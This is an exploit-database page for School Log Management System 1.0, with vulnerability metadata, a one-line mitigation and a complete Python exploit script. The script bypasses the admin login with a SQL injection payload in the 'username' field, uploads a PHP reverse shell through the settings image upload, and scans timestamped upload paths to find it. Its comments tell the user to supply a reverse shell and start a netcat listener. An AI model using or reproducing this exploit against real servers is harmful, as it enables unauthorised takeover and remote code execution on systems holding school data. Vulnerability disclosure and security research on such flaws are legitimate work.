School Log Management System 1.0 - 'username' SQL Injection / Remote Code Execution

vendor:

School Log Management System

by:

mosaaed

9.8

CVSS

HIGH

SQL Injection / Remote Code Execution

CWE

Product Name: School Log Management System

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:sourcecodester:school_log_management_system

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Parrot 5.5.17 + Apache 2.4.46

2020

School Log Management System 1.0 – ‘username’ SQL Injection / Remote Code Execution

This exploit allows an attacker to gain access to the School Log Management System 1.0 by exploiting a SQL Injection vulnerability in the 'username' parameter. The attacker can then upload a malicious PHP reverse shell to the server and gain remote code execution.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the web server should be configured to only allow the upload of certain file types, and the web application should be configured to only allow the upload of certain file types.

Source

Exploit-DB raw data:

# Exploit Title: School Log Management System 1.0 - 'username' SQL Injection / Remote Code Execution
# Date: 4-11-2020
# Exploit Author: mosaaed
# Vendor Homepage: https://www.sourcecodester.com/php/14562/school-log-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/school-log-management-system_1.zip
# Version: 1.0
# Tested on: Parrot 5.5.17 + Apache 2.4.46

# replace shell.php with your own php reverse shell
# change [TARGET URL] to target URL or IP address
# setup your netcat listener for sum good ol shellz



#!/usr/bin/python3

import requests
import time

def sqli_admin():
        s = requests.Session()
        data = {"username":"admin'or'1'=1#","password":"hacked"}
        adminlogin = "http://localhost/slms/admin/ajax.php?action=save_settings"
        s.post(adminlogin,data=data)
        return s

def trigger_rce(session):
        starttime = int(time.time())
        multipart_form_data = {
        "name": ("cyberscurity"),
        "email": ("test@test.com"),
        "contact" : ("+11111111111"),
        "about" : ("Nothing much about it"),
        "img" : ("shell.php", open("shell.php", "rb"))
        }
        session.post("http://localhost/slms/admin/ajax.php?action=save_settings", files=multipart_form_data)
        get_shell(starttime-100,starttime+100,session)


def get_shell(start,end,session):
        for i in range(start,end):
                 session.get("http://localhost/slms/admin/assets/uploads/"+str(i)+"_shell.php")
                 response = requests.get ("http://localhost/slms/admin/assets/uploads/"+ str(i) +"_shell.php")
                 if response.status_code == 200:
                            print("http://localhost/slms/admin/assets/uploads/"+str(i)+"_shell.php")
                        

def main():
        session = sqli_admin()
        trigger_rce(session)

if __name__ == '__main__':
        main()